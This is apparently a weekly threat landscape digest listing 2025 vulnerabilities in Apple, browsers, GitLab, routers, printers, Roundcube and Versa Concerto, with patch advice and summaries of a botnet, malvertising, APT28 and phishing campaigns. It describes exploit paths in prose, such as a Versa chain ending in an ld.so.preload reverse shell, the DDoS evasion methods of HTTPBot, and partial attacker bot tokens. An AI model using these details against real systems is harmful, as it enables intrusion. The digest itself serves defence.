Weekly Threat Landscape Digest – Week 22

This week’s cyber threat landscape reveals a notable surge in zero-day exploit activity, targeted phishing operations, and the exploitation of unpatched vulnerabilities across various industries. Adversaries are demonstrating increased precision and adaptability, emphasizing the critical need for organizations to strengthen patch management processes, improve threat detection capabilities, and ensure continuous security monitoring. Equally essential are ongoing employee awareness programs, timely access to actionable threat intelligence, and a robust, well-practiced incident response plan to enable rapid containment and recovery from emerging threats.
- High-Severity Privilege Escalation in Apple Devices (CVE-2025-31219)
Apple has patched a high-severity vulnerability (CVE-2025-31219) in the XNU kernel, affecting macOS, iOS, iPadOS, watchOS, tvOS, and visionOS. The flaw stems from a race condition in memory handling, allowing a local attacker to escalate privileges and execute code with system-level access. With a CVSS score of 8.8, this issue could lead to full device compromise if left unpatched. Although no active exploitation has been reported, immediate updates are recommended.
Impacted Versions:
- macOS Sequoia < 15.5
- macOS Sonoma < 14.7.6
- macOS Ventura < 13.7.6
- iOS / iPadOS < 18.5
- tvOS < 18.5
- watchOS < 11.5
- visionOS < 2.5
Fixed In:
- macOS Sequoia 15.5
- iOS / iPadOS 18.5
- Other platforms’ latest versions as listed above
Action Required:
Update all Apple devices to the latest versions to prevent exploitation.
Reference: https://www.zerodayinitiative.com/advisories/ZDI-25-305/
- Medium-Severity Cross-Site Scripting in Bitwarden (CVE-2025-5138)
A DOM-based Cross-Site Scripting (XSS) vulnerability (CVE-2025-5138) has been discovered in Bitwarden, a widely used open-source password management service. This vulnerability allows attackers to inject and execute arbitrary JavaScript code by uploading a specially crafted PDF file through Bitwarden’s Resources upload feature. The root cause lies in the insufficient validation and sanitization of user-controlled input in the PDF file handler, leading to unintended script execution in the context of the Bitwarden web app.
Successful exploitation could lead to critical consequences such as session hijacking, theft of stored credentials, and unauthorized actions performed under the victim’s account. The presence of a publicly available proof-of-concept increases the urgency for users and administrators to take mitigation steps.
Impacted Versions:
Bitwarden versions ≤ 2.25.1
Fixed In:
A patched version beyond 2.25.1 is expected — users are advised to monitor official channels for the release.
Action Required:
- Avoid uploading untrusted PDF files until a fix is applied
- Apply the latest security update once available
- Monitor for any unusual activity in Bitwarden accounts
Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-5138
- Multiple Vulnerabilities Patched in Google Chrome (CVE-2025-5063 to CVE-2025-5283)
Google has released Chrome version 137.0.7151.55/56 for Windows and Mac, 137.0.7151.55 for Linux, and 137.0.7151.51 for iOS, addressing several high- and medium-severity vulnerabilities. These flaws, if exploited, could allow remote code execution, data exposure, memory corruption, or denial-of-service attacks.
Key Vulnerabilities Addressed:
- CVE-2025-5063 (High): Use-after-free in Compositing — may lead to arbitrary code execution
- CVE-2025-5280 (High): Out-of-bounds write in V8 — memory corruption, possible RCE
- CVE-2025-5064 (Medium): Improper implementation in Background Fetch API — data exposure
- CVE-2025-5065 (Medium): Validation issue in FileSystemAccess API — potential data leakage
- CVE-2025-5066 (Medium): Messaging component flaw — could enable spoofing
- CVE-2025-5281 (Medium): BFCache caching issue — security bypass risk
- CVE-2025-5283 (Medium): Use-after-free in libvpx — memory corruption/crash risk
- CVE-2025-5067 (Low): UI spoofing potential in Tab Strip component
Fixed Versions:
- Chrome 137.0.7151.55/56 (Windows, Mac)
- Chrome 137.0.7151.55 (Linux)
- Chrome 137.0.7151.51 (iOS)
Action Required:
Users are strongly advised to update Chrome across all platforms to the latest version to mitigate these security risks.
Reference:
https://chromereleases.googleblog.com/2025/05/stable-channel-update-fordesktop_27.html
- Critical Security Flaw in Mozilla Firefox and Thunderbird (CVE-2025-5262)
Mozilla has released security updates for Firefox and Thunderbird, including their ESR (Extended Support Release) versions, addressing multiple vulnerabilities. The most critical is CVE-2025-5262 — a double-free flaw in the libvpx encoder component used for WebRTC. This issue could result in memory corruption and lead to a crash exploitable for arbitrary code execution.
Key Vulnerability:
- CVE-2025-5262 (Critical):
A double-free vulnerability in vpx_codec_enc_init_multi during failed encoder initialization. Attackers could leverage this for memory corruption and potentially gain control of affected systems.
Other Risks Highlighted in Mozilla Advisories:
- Local code execution vulnerabilities
- Cross-origin data leakage risks
- Clickjacking vectors
Fixed In:
- Firefox 139
- Firefox ESR 115.24 / 128.11
- Thunderbird 139 / 128.11
Action Required:
Immediately update all Firefox and Thunderbird instances to the latest versions to prevent exploitation.
References:
- https://www.mozilla.org/en-US/security/advisories/mfsa2025-42/
- https://www.mozilla.org/en-US/security/advisories/mfsa2025-43/
- https://www.mozilla.org/en-US/security/advisories/mfsa2025-44/
- https://www.mozilla.org/en-US/security/advisories/mfsa2025-45/
- https://www.mozilla.org/en-US/security/advisories/mfsa2025-46/
- Privilege Escalation Vulnerabilities in XenServer and Citrix Hypervisor VM Tools (CVE-2025-27462, CVE-2025-27463, CVE-2025-27464)
Citrix has issued security updates addressing three high-severity vulnerabilities impacting XenServer VM Tools for Windows. These flaws allow local attackers within a guest Windows VM to escalate privileges, posing a serious risk of complete VM compromise. The vulnerabilities do not affect Linux VMs, and no updates are required for the underlying XenServer or Citrix Hypervisor hosts.
Key Vulnerabilities:
- CVE-2025-27462
- CVE-2025-27463
- CVE-2025-27464
Type: Local Privilege Escalation (within Windows guest VMs)
Impact: A malicious user with unprivileged code execution inside the guest VM can elevate privileges and potentially take full control of the virtual machine.
Affected Platforms:
- XenServer VM Tools for Windows versions prior to 9.4.1
- Host Environments: XenServer 8.4, Citrix Hypervisor 8.2 CU1 LTSR
- Guest Impact: Windows-based guest VMs only
- Linux VMs: Not affected
Fixed Version:
- XenServer VM Tools for Windows 9.4.1 or newer
Action Required:
Update all affected Windows guest VMs with the latest XenServer VM Tools (v9.4.1+).
- Critical Security Updates for Tenable Network Monitor (CVE-2025-24916, CVE-2025-24917)
Tenable has released version 6.5.1 of Network Monitor to patch two high-severity local privilege escalation vulnerabilities and address weaknesses in bundled third-party libraries. These flaws could allow unauthorized users or non-administrative actors to gain SYSTEM-level access, posing a serious threat to system integrity and control.
Key Vulnerabilities:
- CVE-2025-24916 – Insecure permissions on sub-directories in non-default Windows installs.
CVSS: 7.0 (High)
Impact: May allow privilege escalation by unauthorized users. - CVE-2025-24917 – Malicious files staged by non-admin users could be executed with SYSTEM privileges.
CVSS: 7.8 (High)
Impact: Enables full system compromise through local code execution.
Affected Versions:
- All versions prior to Tenable Network Monitor 6.5.1
Fixed Version:
- 6.5.1 or newer
Third-Party Library Updates in 6.5.1:
- OpenSSL → v3.0.16
- expat → v2.7.0
- curl → v8.12.0
- libpcap → v1.10.5
- libxml2 → v2.13.8
These updates mitigate known vulnerabilities impacting system confidentiality, integrity, and availability.
Action Required:
Upgrade all Tenable Network Monitor deployments to version 6.5.1 or later to ensure security.
Reference:
https://www.tenable.com/security/tns-2025-10
- Multiple Vulnerabilities Patched in GitLab CE/EE (May 2025 Release)
Denial of Service via Large Blob Endpoint (CVE-2025-0993)
A high-severity vulnerability allows authenticated users to exhaust server resources through unprotected large blob endpoints, resulting in denial of service. The issue carries a CVSS score of 7.5 and affects performance and availability.
2FA Bypass via SAML Response Manipulation (CVE-2024-12093)
Improper XPath validation in SAML response processing enables attackers to bypass two-factor authentication under specific configurations. This vulnerability is rated medium severity (CVSS 6.8).
Abuse of Discord Webhook Integration (CVE-2024-7803)
The Discord webhook feature can be exploited to cause denial of service by sending excessive or malformed requests. This vulnerability holds a CVSS score of 6.5.
Kubernetes Cluster Token Misuse (CVE-2025-3111)
Improper input validation in Kubernetes cluster token handling allows authenticated users to trigger denial of service conditions. This medium-severity flaw also scores 6.5.
Exposure of Masked CI Variables (CVE-2025-4979)
Certain conditions in the GitLab UI may allow attackers to view masked CI/CD variables, leading to potential leakage of sensitive information. CVSS score is 4.9.
Additional Medium and Low Severity Issues
Other vulnerabilities include bypassing 2FA due to flawed group access controls (CVE-2025-0605, CVSS 4.6), full visibility of email addresses meant to be partially hidden (CVE-2025-0679, CVSS 4.3), branch name confusion in confidential merge requests (CVE-2024-9163, CVSS 3.5), and limited-permission access to job data via GraphQL queries (CVE-2025-1110, CVSS 2.7).
Affected and Fixed Versions
GitLab CE/EE versions before 18.0.1, 17.11.3, and 17.10.7 are affected. Users are strongly advised to upgrade to these patched versions to mitigate the listed vulnerabilities.
Reference:
https://about.gitlab.com/releases/2025/05/21/patch-release-gitlab-18-0-1-released/
- Critical Authentication Bypass Vulnerability in NETGEAR Routers (CVE-2025-4978)
A critical vulnerability (CVE-2025-4978) has been discovered in the NETGEAR DGND3700v2 wireless router. This flaw allows remote unauthenticated attackers to bypass authentication mechanisms through a hidden backdoor present in the embedded HTTP server. The vulnerability has been assigned a CVSS v4 score of 9.3, reflecting its high impact and ease of exploitation.
Impact of Exploitation
Successful exploitation of this vulnerability can grant attackers full administrative access to the affected router. Once compromised, attackers may perform actions such as stealing credentials, hijacking DNS settings, or installing persistent malware on the network. This could lead to complete compromise of the internal network and user privacy.
Affected Product and Version
The vulnerability specifically affects the NETGEAR DGND3700v2 router running firmware version V1.1.00.15_1.00.15NA. No other models are reported to be impacted at this time.
Patched Firmware Version
NETGEAR has released firmware version V1.1.00.26 and later to address this critical flaw. Users of the affected model are urged to upgrade immediately to the latest firmware available on the official NETGEAR website.
Reference
https://nvd.nist.gov/vuln/detail/CVE-2025-4978
- Critical Remote Code Execution Vulnerabilities in Netwrix Password Secure (CVE-2025-26817 & CVE-2025-26818)
Netwrix has disclosed two critical remote code execution vulnerabilities affecting its Password Secure product. Identified as CVE-2025-26817 and CVE-2025-26818, these issues impact all versions up to and including 9.2.1. The vulnerabilities were responsibly reported by security researchers and allow authenticated users to execute arbitrary commands on the underlying system via shared document and SSH application functionalities.
Impact of Exploitation
Both vulnerabilities carry a CISA ADPBase Score of 9.8, highlighting their critical nature. Successful exploitation may lead to full system compromise. While no public exploit code has been identified yet and no active exploitation has been observed, the public disclosure of these flaws significantly increases the risk of future attacks.
Affected Versions
All versions of Netwrix Password Secure up to and including 9.2.1 are vulnerable. Organizations using this software should consider themselves at risk if not updated.
Patched Version
Netwrix has released version 9.2.2 to address both vulnerabilities. This update eliminates the command injection flaws and should be applied immediately across all affected systems.
Reference
https://community.netwrix.com/t/adv-2025-009-remote-code-execution-vulnerabilities-in-netwrix-password-secure/5034
- Critical Remote Code Execution Vulnerability in Adobe Dreamweaver (CVE-2025-30310)
A critical remote code execution (RCE) vulnerability has been discovered in Adobe Dreamweaver, tracked as CVE-2025-30310. The issue resides in the deprecated JavaScript V8 engine used by Dreamweaver V8. Successful exploitation allows attackers to execute arbitrary code when a user opens a malicious file or visits a crafted web page, potentially leading to full system compromise based on the user’s privileges.
Impact of Exploitation
The vulnerability is classified as critical. It requires some user interaction—such as opening a malicious file or browsing to a specially crafted page—to trigger the payload. Once exploited, attackers can execute arbitrary code within the context of the Dreamweaver process, giving them control over the system.
Affected Versions
All Adobe Dreamweaver versions up to 21.4 on both Windows and macOS platforms are affected.
Patched Version
Adobe has addressed the vulnerability in version 21.5 for both Windows and macOS. Users must ensure they are running this version or later to mitigate the risk.
Reference
https://helpx.adobe.com/security/products/dreamweaver/apsb25-35.html
- Critical Remote Code Execution Vulnerability in TI WooCommerce Wishlist Plugin (CVE-2025-47577)
A critical unauthenticated remote code execution (RCE) vulnerability has been identified in the TI WooCommerce Wishlist plugin for WordPress, tracked as CVE-2025-47577. This flaw allows attackers to upload arbitrary files, including malicious PHP scripts, to the server without authentication. The vulnerability affects plugin versions up to and including 2.9.2 and remains unpatched as of this advisory.
Root Cause and Impact
The issue originates from the tinvwl_upload_file_wc_fields_factory function located in the integrations/wc-fieldsfactory.php file. This function uses WordPress’s wp_handle_upload mechanism but explicitly disables file type security checks by setting the ‘test_type’ => false parameter. If the WC Fields Factory plugin is also active, an attacker can exploit this vector to execute arbitrary code, steal sensitive information, and compromise the entire WordPress installation.
Affected Versions
All TI WooCommerce Wishlist plugin versions up to and including 2.9.2.
Mitigation and Recommendations
Administrators are strongly advised to deactivate and remove the plugin immediately from affected systems. Additionally, review the server for unauthorized or suspicious uploads, enable a Web Application Firewall (WAF), restrict PHP execution in upload directories, and deploy file integrity monitoring tools. Until a patch is released, continuous monitoring and additional security layers are essential.
Reference
https://patchstack.com/articles/unpatched-critical-vulnerability-in-ti-woocommercewishlist-plugin/
https://nvd.nist.gov/vuln/detail/CVE-2025-47577
- High-Severity Vulnerability in Siemens SiPass Integrated (CVE-2022-31812)
A high-severity vulnerability (CVE-2022-31812) has been identified in the Siemens SiPass Integrated physical access control system. This flaw allows unauthenticated remote attackers to trigger a denial-of-service (DoS) condition, potentially disrupting building entry systems, alarms, or other security mechanisms that rely on SiPass. The issue affects all versions prior to V2.95.3.18.
Root Cause and Impact
The vulnerability stems from improper handling of integrity checks in network packet processing. Specifically, an out-of-bounds read occurs due to the software attempting to read beyond the allocated memory buffer. This flaw does not require any authentication or user interaction, and a successful exploit can crash the application, rendering critical physical access functions inoperable.
Affected Versions
All Siemens SiPass Integrated versions prior to V2.95.3.18.
Mitigation and Recommendations
Siemens has released version V2.95.3.18 to address the issue. Organizations using SiPass are advised to apply the update immediately to avoid potential security disruptions. Until the patch is applied, monitoring network traffic and enforcing strict access control on management interfaces is recommended.
Reference
https://cert-portal.siemens.com/productcert/html/ssa-041082.html
- Critical RCE Vulnerability in Roundcube Webmail (CVE-2025-48745)
A critical post-authentication remote code execution (RCE) vulnerability, tracked as CVE-2025-48745, has been identified in Roundcube Webmail. The flaw affects all versions from v1.1.0 to 1.6.10 and allows any authenticated user to execute arbitrary code on the hosting server. This can lead to complete system takeover.
Risk and Exposure
The vulnerability remained undetected for over a decade and poses a severe risk to over 53 million internet-facing servers. Roundcube is commonly deployed with hosting control panels such as cPanel, Plesk, ISPConfig, and DirectAdmin. The exploit is trivial to execute—requiring only a single click—and no special bypass techniques like WAF evasion are needed. The flaw is similar to previous Roundcube vulnerabilities exploited by threat actors such as APT28 (GRU).
Mitigation Steps
A patched version (v1.6.11) is expected soon. Until then, organizations are advised to:
- Restrict access to Roundcube instances using IP whitelisting or VPN.
- Monitor server logs for suspicious activity from low-privilege accounts.
- Temporarily disable Roundcube access if not immediately needed.
Affected Versions
Roundcube Webmail versions from v1.1.0 through v1.6.10.
Reference
https://www.csc.gov.ae/
- High-Severity Vulnerability in Johnson Controls ICU Tool (CVE-2025-26383)
A high-severity vulnerability has been identified in the Johnson Controls iSTAR Configuration Utility (ICU) tool, tracked as CVE-2025-26383. The flaw affects all versions of the ICU tool prior to 6.9.5 and results from a memory leak caused by an uninitialized variable.
Risk and Exposure
An attacker with network access to the Windows machine running the ICU tool can exploit this vulnerability to access sensitive information from the host system’s memory. This issue is limited to the ICU tool and does not affect the iSTAR controllers themselves, including legacy, Ultra, and G2 series devices.
Mitigation Steps
Organizations are strongly advised to:
- Update the ICU tool to version 6.9.5 or later.
- Limit network access to systems running ICU tools.
- Monitor memory and application behavior for signs of exploitation.
Affected Versions
All versions of the Johnson Controls ICU tool prior to 6.9.5.
Reference
https://www.johnsoncontrols.com/trust-center/cybersecurity/security-advisories
- Critical Signature Spoofing Flaw in OpenPGP.js (CVE-2025-47934)
A critical vulnerability, tracked as CVE-2025-47934, has been identified in OpenPGP.js—a widely used open-source JavaScript library for enabling end-to-end encryption in web applications. The flaw enables attackers to spoof digital signatures on inline-signed and signed+encrypted messages, compromising message integrity and trust.
Technical Details
- Impact Type: Signature Spoofing / Message Integrity Bypass
- Affected Functions:
- openpgp.verify() (for inline-signed messages)
- openpgp.decrypt() with verificationKeys (for signed+encrypted messages)
- Vulnerable Versions:
- v5.0.1 to v5.11.2
- v6.0.0-alpha.0 to v6.1.0
- (v4 is not affected)
- Patched Versions:
- v5.11.3 and v6.1.1
Workarounds
- For inline-signed messages: Manually extract message and signatures, and use detached verification via openpgp.verify.
- For signed+encrypted messages: First decrypt without verificationKeys, then separately verify the signature using openpgp.verify.
Mitigation Steps
- Update OpenPGP.js to v5.11.3 or v6.1.1 immediately.
- Audit applications using the library to ensure no downstream impact from signature spoofing.
Reference
https://github.com/openpgpjs/openpgpjs/security/advisories/GHSA-8qff-qr5q-5pr8
- Critical Vulnerabilities in Versa Concerto (CVE-2025-34025, CVE-2025-34026, CVE-2025-34027)
Three critical vulnerabilities have been discovered in Versa Networks’ Concerto orchestration platform. These flaws allow remote attackers to bypass authentication, escape Docker containers, and execute arbitrary code on the host system. If exploited, attackers could gain full control over affected infrastructure.
Technical Details
- CVE-2025-34026 – Authentication Bypass via Traefik Misconfiguration
- CVSS Score: 9.2 (Critical)
- Impact: Unauthorized access to internal Spring Boot Actuator endpoints such as /actuator/heapdump, potentially leaking sensitive memory and operational data.
- Chaining: Can be linked with CVE-2024-45410 for extended exploitation.
- CVE-2025-34027 – RCE via Arbitrary File Write
- CVSS Score: 10.0 (Critical)
- Impact: Exploits a race condition in the /portalapi/v1/package/spack/upload endpoint to upload malicious files and modify /etc/ld.so.preload, enabling arbitrary code execution through LD_PRELOAD.
- Outcome: Reverse shell access on the host.
- CVE-2025-34025 – Docker Container Escape
- CVSS Score: 8.6 (High)
- Impact: Due to unsafe default mounting of host paths inside Docker, attackers can escalate from container access to full host-level code execution.
Mitigation & Recommendations
- Upgrade: Apply the patch by updating to Concerto version 12.2.1 GA or later.
- If patching is not possible, implement the following mitigations:
- Block semicolons (;) in URL paths.
- Drop HTTP requests with Connection: X-Real-Ip.
- Restrict access to the Traefik reverse proxy and admin endpoints.
- Monitor logs and traffic targeting sensitive endpoints like /portalapi/v1/package/spack/upload and /actuator/heapdump.
- Apply custom WAF rules to block abnormal traffic patterns.
References
- https://nvd.nist.gov/vuln/detail/CVE-2025-34026
- https://nvd.nist.gov/vuln/detail/CVE-2025-34027
- https://nvd.nist.gov/vuln/detail/CVE-2025-34025
- Critical Vulnerabilities in Canon Office & Laser Printers (CVE-2024-12647, CVE-2024-12648, CVE-2024-12649, CVE-2025-2146)
Multiple critical buffer overflow vulnerabilities have been disclosed in Canon’s Office/Small Office Multifunction and Laser Printers. Tracked as CVE-2024-12647, CVE-2024-12648, CVE-2024-12649, and CVE-2025-2146, these flaws allow remote attackers to execute arbitrary code or trigger denial-of-service (DoS) conditions on affected devices. The vulnerabilities carry a CVSS v3 base score of 9.8, reflecting critical severity.
Technical Details
- CVE IDs: CVE-2024-12647, CVE-2024-12648, CVE-2024-12649, CVE-2025-2146
- Vulnerability Class: Out-of-Bounds Write (CWE-787)
- CVSS v3 Base Score: 9.8 (Critical)
- Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Impact:
- Remote Code Execution (RCE)
- Denial-of-Service (DoS)
- Attack Vector: Remote network access
- Prerequisites: No authentication or user interaction required
- Vulnerable Systems: Devices connected directly to the Internet without firewall protection are especially exposed.
Affected Canon Printer Models
- imageCLASS MF Series:
- MF455DW, MF453DW, MF452DW, MF451DW
- MF656CDW, MF654CDW, MF653CDW, MF652CW
- MF1238 II, MF1643iF II, MF1643i II
- imageCLASS LBP Series:
- LBP237DW, LBP236DW
- LBP632CDW, LBP633CDW
- LBP1238 II
Canon has noted that further models may be affected and will update the list accordingly.
Mitigation & Recommendations
- Update all affected Canon printers to the latest firmware provided by Canon.
- Do not expose Canon printers directly to the Internet.
- Segment printers on internal networks with access restrictions.
- Monitor logs for suspicious access attempts on printer network ports.
References
- Critical XXE Vulnerability in WSO2 API Manager (CVE-2025-2905)
Overview
A critical XML External Entity (XXE) vulnerability has been disclosed in the Gateway component of WSO2 API Manager versions ≤ 2.0.0. The flaw allows unauthenticated remote attackers to read files from the server or trigger Denial-of-Service (DoS) via specially crafted URL paths.
Key Details
- CVE: CVE-2025-2905
- Component: WSO2 API Manager Gateway
- Impact:
- File read (info disclosure)
- DoS (service crash)
- Affected Versions: ≤ 2.0.0 (unpatched)
- Root Cause: Improper XML entity resolution handling
- Exploit Condition: Malicious XML via crafted URL
- Patch: Apply WSO2-2016-0151 immediately if not already done.
Mitigation
- Update WSO2 API Manager to latest version.
- Apply historical patch WSO2-2016-0151 if not yet deployed.
- Restrict external XML entity resolution at the gateway level.
Reference:
- HTTPBot Botnet Expanding – High Risk for Windows
A new Go-based botnet, HTTPBot, is rapidly growing since August 2024 and surged in April 2025. It targets gaming platforms, tech firms, and universities, mainly in Asia, with HTTP-layer DDoS attacks that mimic real users.
It supports 7 advanced DDoS methods, including:
- HttpAttack: Dynamic TCP/TLS, randomized headers, retry logic
- BrowserAttack: Hides browser window, imitates user actions
- HttpAutoAttack: Parses Set-Cookie to simulate sessions
- HttpFpDlAttack: Forces full data transfer using HTTP/2
- WebSocketAttack: Uses ws/wss, sends messages like human behavior
- PostAttack: Uses POST method, shuffles headers
- CookieAttack: Automates cookie handling during browser-based attack
Evasion Techniques:
- Randomized user agents, headers, cookies, and URL paths
- Retry delay on HTTP 429/405 responses
- Avoids detection by mimicking browser activity and dynamic patterns
- Uses attack ID to control each campaign precisely
Persistence:
- Registers itself at Windows startup via registry
- Sends “ok” to C2 and waits for attack commands
Risk:
- Shifts from traditional DDoS to low-traffic, high-impact targeted business-layer attacks
- Difficult to detect using rule-based anti-DDoS systems
Defenses:
- Use CAPTCHA, dynamic session validation
- Behavior-based detection preferred over static rules
- Monitor registry for unusual startup entries
- Protect login/payment APIs with rate limits and session integrity checks
- Fake Kling AI Malvertising Campaign
In May 2025, Check Point Research uncovered a malicious campaign impersonating Kling AI, a legitimate AI-powered media generation platform with over 6 million users since launch. The attackers ran fake Facebook ads redirecting users to a counterfeit Kling AI website.
Malware Delivery Mechanism
Victims were tricked into uploading prompts expecting media outputs. Instead, they received executables disguised as media files (.jpg or .mp4) using Hangul Filler Unicode characters in filenames. When run, these files installed the PureHVNC remote access trojan (RAT).
Malware Capabilities
- Enables remote control of the infected system
- Keylogging, file exfiltration, and system surveillance
- Uses .NET Native AOT compilation to evade detection
- Stealth techniques make analysis difficult
Attribution and Scope
- Language artifacts in the malware suggest Vietnamese origins
- The fake ads used Vietnamese contact numbers
- The campaign had global reach, affecting users in Asia, Europe, and beyond
Key Threat Components
- Malvertising via Facebook
- Fake website resembling Kling AI
- Trojan disguised as AI output file
- Obfuscation via Unicode and advanced .NET tactics
Impact and Risk
- Targets users interested in generative AI tools
- High risk of credential theft and device compromise
- Difficult to detect due to advanced evasion methods
Security Recommendations
- Avoid downloading files from unknown sources
- Verify URLs before uploading sensitive content
- Use endpoint protection capable of identifying obfuscated threats
- Block known malicious domains related to the campaign
References
https://research.checkpoint.com/2025/impersonated-kling-ai-site-installs-malware/
- APT28 Espionage Campaign Targets Logistics and Tech Firms Supporting Ukraine
APT28 (Fancy Bear), a Russian GRU-affiliated threat group (Unit 26165), is conducting a coordinated cyber espionage campaign against logistics and technology companies supporting Ukraine and NATO allies. A joint advisory (AA25-141A) issued by 21 intelligence agencies—including CISA and the UK’s NCSC—warns of intelligence-gathering operations targeting supply chain entities, cloud services, and infrastructure providers.
Campaign Scope & Objectives:
- Focus on air, sea, and rail logistics companies aiding Ukraine.
- Use of municipal and private surveillance systems near strategic hubs.
- Blended physical and cyber intelligence gathering, including attacks on rail control system vendors.
TTPs and Identity-Based Intrusions:
- Credential brute-force, spearphishing, and Exchange mailbox permission abuse.
- Post-authentication persistence via identity impersonation and targeted reconnaissance.
- Detection evasion through stealthy activity in cloud and SaaS environments.
CISA’s Key Recommendations:
- Increase monitoring and threat hunting for APT28-related TTPs and IOCs.
- Assume compromise and posture defenses accordingly.
- Review permissions and activity on Microsoft Exchange and similar platforms.
Reveal Security’s Additional Guidance:
- Extend visibility beyond network perimeters to cloud and SaaS platforms.
- Focus on post-authentication behavior analytics to detect stealthy credential abuse.
- Employ behavioral analytics to uncover novel, low-and-slow attacks in modern environments.
Security Focus Areas:
- SaaS and cloud identity monitoring.
- Behavioral baselining across user roles.
- Continuous detection in authenticated sessions.
- Fake OneNote Login Page Used to Steal Office365 and Outlook Credentials
A persistent phishing campaign is targeting users in the U.S. and Italy by impersonating Microsoft OneNote and PEC email systems. The attackers leverage cloud platforms (Notion, Google Docs) and Telegram bots for hosting and exfiltration.
Attack Flow:
- Victims are lured via phishing emails to fake login pages hosted on Notion or Glitch.
- Credentials and IP addresses are harvested via a malicious JavaScript using ipify.org.
- Data is exfiltrated via Telegram Bot API using hardcoded bot tokens and chat IDs.
- Victims are redirected to the real Microsoft login page afterward to avoid suspicion.
Tactics Used:
- Use of free hosting (Notion, Glitch, Google Docs, RenderForest).
- Telegram bots as C2 (Command & Control).
- Basic obfuscation in early campaigns; current versions are streamlined.
- Focus appears to be access brokering, not direct attacks.
Indicators:
- Hardcoded Telegram bot tokens.
- Pages mimicking “Microsoft OneNote” or “PEC Aruba”.
- Network traffic to api.telegram.org after visiting Notion/Glitch-hosted links.
Sample Telegram Bots Used:
- @Sultannanewbot – Token starts with 7547274214…
- @remaxx24bot – Token starts with 7072331661…
- @Resultantnewbot – Token starts with 6741707974…
Detection Recommendations:
- Monitor traffic to Telegram Bot API, especially from links opened via Notion/Glitch.
- Inspect suspicious page titles mimicking official services.
- Deploy rules to detect JavaScript exfiltration behavior and known bot patterns.
Reference: